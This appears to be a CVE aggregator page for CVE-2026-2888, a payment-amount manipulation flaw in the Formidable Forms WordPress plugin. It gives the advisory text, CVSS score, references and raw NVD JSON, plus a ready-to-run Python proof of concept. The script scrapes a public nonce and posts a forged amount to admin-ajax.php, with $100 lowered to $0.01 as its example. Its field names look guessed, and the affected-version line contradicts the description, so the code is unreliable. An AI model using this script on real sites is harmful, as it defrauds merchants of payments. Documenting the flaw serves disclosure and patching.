CVE-2026-2888

Description

The Formidable Forms plugin for WordPress is vulnerable to an authorization bypass through user-controlled key in all versions up to, and including, 6.28. This is due to the `frm_strp_amount` AJAX handler (`update_intent_ajax`) overwriting the global `$_POST` data with attacker-controlled JSON input and then using those values to recalculate payment amounts via field shortcode resolution in `generate_false_entry()`. The handler relies on a nonce that is publicly exposed in the page's JavaScript (`frm_stripe_vars.nonce`), which provides CSRF protection but not authorization. This makes it possible for unauthenticated attackers to manipulate PaymentIntent amounts before payment completion on forms using dynamic pricing with field shortcodes, effectively paying a reduced amount for goods or services.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Formidable Forms plugin < 6.28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import json
import requests

# CVE-2026-2888 PoC - Formidable Forms Payment Manipulation
# This PoC demonstrates how an unauthenticated attacker can manipulate payment amounts

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"

def get_nonce(site_url):
    """Extract the publicly exposed nonce from page JavaScript"""
    response = requests.get(site_url)
    # Extract frm_stripe_vars.nonce from page source
    import re
    match = re.search(r'frm_stripe_vars\s*=\s*\{[^}]*nonce:\s*"([a-zA-Z0-9]+)"', response.text)
    if match:
        return match.group(1)
    return None

def exploit_payment_manipulation(site_url, form_id, original_amount, manipulated_amount):
    """
    Exploit the authorization bypass to manipulate PaymentIntent amount
    """
    nonce = get_nonce(site_url)
    if not nonce:
        print("[-] Failed to extract nonce")
        return False
    
    print(f"[+] Extracted nonce: {nonce}")
    
    # Construct malicious payload with manipulated amount
    payload = {
        "action": "frm_strp_amount",
        "nonce": nonce,
        "form_id": form_id,
        "payment_amount": manipulated_amount,  # Attacker's chosen amount
        "entry_id": 0,  # New entry
        "fields": json.dumps({
            "field_123": manipulated_amount  # Manipulated field value
        })
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            data=payload,
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
        )
        
        result = response.json()
        if result.get("success"):
            print(f"[+] Successfully manipulated payment from ${original_amount} to ${manipulated_amount}")
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return True
        else:
            print(f"[-] Exploitation failed: {result}")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    site = "https://target-formidable-site.com"
    # Example: Change $100 to $0.01
    exploit_payment_manipulation(site, form_id=5, original_amount=100, manipulated_amount=0.01)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2888
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2888
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2888/
[4] VulDB https://vuldb.com/cve/CVE-2026-2888
[5] https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteHooksController.php#L88
[6] https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L322
[7] https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L402
[8] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480574%40formidable%2Ftrunk&old=3460198%40formidable%2Ftrunk&sfp_email=&sfph_mail=
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/b8be3b6e-a035-4e6f-ba2b-ce9e59ebf2e0?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2888", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:34.707", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Formidable Forms plugin for WordPress is vulnerable to an authorization bypass through user-controlled key in all versions up to, and including, 6.28. This is due to the `frm_strp_amount` AJAX handler (`update_intent_ajax`) overwriting the global `$_POST` data with attacker-controlled JSON input and then using those values to recalculate payment amounts via field shortcode resolution in `generate_false_entry()`. The handler relies on a nonce that is publicly exposed in the page's JavaScript (`frm_stripe_vars.nonce`), which provides CSRF protection but not authorization. This makes it possible for unauthenticated attackers to manipulate PaymentIntent amounts before payment completion on forms using dynamic pricing with field shortcodes, effectively paying a reduced amount for goods or services."}, {"lang": "es", "value": "El plugin Formidable Forms para WordPress es vulnerable a un bypass de autorización a través de una clave controlada por el usuario en todas las versiones hasta la 6.28, inclusive. Esto se debe a que el gestor AJAX `frm_strp_amount` (`update_intent_ajax`) sobrescribe los datos globales `$_POST` con entrada JSON controlada por el atacante y luego utiliza esos valores para recalcular los importes de pago a través de la resolución de shortcode de campo en `generate_false_entry()`. El gestor se basa en un nonce que está expuesto públicamente en el JavaScript de la página (`frm_stripe_vars.nonce`), lo que proporciona protección CSRF pero no autorización. Esto hace posible que atacantes no autenticados manipulen los importes de PaymentIntent antes de la finalización del pago en formularios que utilizan precios dinámicos con shortcodes de campo, pagando efectivamente una cantidad reducida por bienes o servicios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteHooksController.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L402", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480574%40formidable%2Ftrunk&old=3460198%40formidable%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b8be3b6e-a035-4e6f-ba2b-ce9e59ebf2e0?source=cve", "source": "[email protected]"}]}}